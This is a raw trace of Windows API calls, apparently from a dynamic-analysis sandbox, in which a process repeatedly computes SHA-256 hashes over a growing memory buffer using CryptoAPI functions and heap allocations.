	[0154.821] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.822] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.822] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0154.822] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306bb8
	[0154.822] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306bb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306bb8, pdwDataLen=0x128aac) returned 1
	[0154.822] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.822] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.822] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.823] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.823] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0154.823] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306be0
	[0154.823] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306be0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306be0, pdwDataLen=0x128aac) returned 1
	[0154.823] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.823] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.823] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.823] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.823] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0154.823] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306c08
	[0154.823] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306c08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306c08, pdwDataLen=0x128aac) returned 1
	[0154.824] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.824] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.824] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.824] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.824] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0154.824] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.824] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306c30
	[0154.824] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306c30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306c30, pdwDataLen=0x128aac) returned 1
	[0154.824] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.824] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.824] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.825] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.825] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0154.825] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.825] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306c58
	[0154.825] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306c58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306c58, pdwDataLen=0x128aac) returned 1
	[0154.825] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.825] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.825] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.827] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.827] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0154.827] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.827] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306c80
	[0154.827] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306c80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306c80, pdwDataLen=0x128aac) returned 1
	[0154.827] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.827] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.827] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.828] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.828] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0154.828] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.828] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306ca8
	[0154.828] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306ca8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306ca8, pdwDataLen=0x128aac) returned 1
	[0154.828] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.828] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.828] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.829] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.829] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0154.829] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306cd0
	[0154.830] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306cd0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306cd0, pdwDataLen=0x128aac) returned 1
	[0154.830] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.830] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.830] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.830] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.830] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0154.830] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.830] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306cf8
	[0154.830] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306cf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306cf8, pdwDataLen=0x128aac) returned 1
	[0154.830] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.831] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.831] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.831] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.831] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0154.831] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306d20
	[0154.832] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306d20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306d20, pdwDataLen=0x128aac) returned 1
	[0154.832] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.832] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.832] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.832] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.832] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0154.832] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.832] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306d48
	[0154.832] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306d48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306d48, pdwDataLen=0x128aac) returned 1
	[0154.832] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.832] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.832] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.833] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.833] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0154.833] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.833] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306d70
	[0154.833] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306d70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306d70, pdwDataLen=0x128aac) returned 1
	[0154.833] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.833] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.833] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.834] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.834] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0154.834] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306d98
	[0154.834] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306d98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306d98, pdwDataLen=0x128aac) returned 1
	[0154.834] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.834] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.834] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.835] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.835] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0154.835] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306dc0
	[0154.835] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306dc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306dc0, pdwDataLen=0x128aac) returned 1
	[0154.835] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.835] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.835] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.835] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.835] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0154.835] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306de8
	[0154.835] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306de8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306de8, pdwDataLen=0x128aac) returned 1
	[0154.836] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.836] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.836] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.836] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.836] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0154.836] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.836] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306e10
	[0154.836] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306e10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306e10, pdwDataLen=0x128aac) returned 1
	[0154.836] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.836] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.836] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.837] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.837] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0154.837] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.837] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306e38
	[0154.837] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306e38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306e38, pdwDataLen=0x128aac) returned 1
	[0154.837] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.837] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.837] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.838] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.838] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0154.838] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.838] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306e60
	[0154.838] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306e60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306e60, pdwDataLen=0x128aac) returned 1
	[0154.838] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.838] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.838] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.839] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.839] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0154.839] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306e88
	[0154.839] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306e88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306e88, pdwDataLen=0x128aac) returned 1
	[0154.839] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.839] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.839] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.839] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.839] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0154.839] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306eb0
	[0154.840] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306eb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306eb0, pdwDataLen=0x128aac) returned 1
	[0154.840] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.840] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.840] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.840] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.840] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0154.840] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.840] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306ed8
	[0154.840] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306ed8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306ed8, pdwDataLen=0x128aac) returned 1
	[0154.840] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.840] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.840] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.841] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.841] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0154.841] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.841] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306f00
	[0154.841] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306f00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306f00, pdwDataLen=0x128aac) returned 1
	[0154.841] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.841] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.841] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.841] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.842] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0154.842] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306f28
	[0154.842] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306f28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306f28, pdwDataLen=0x128aac) returned 1
	[0154.842] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.842] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.842] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.842] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.842] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0154.842] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306f50
	[0154.842] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306f50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306f50, pdwDataLen=0x128aac) returned 1
	[0154.842] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.842] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.842] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.842] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.843] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0154.843] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306f78
	[0154.843] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306f78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306f78, pdwDataLen=0x128aac) returned 1
	[0154.843] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.843] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.843] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.843] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
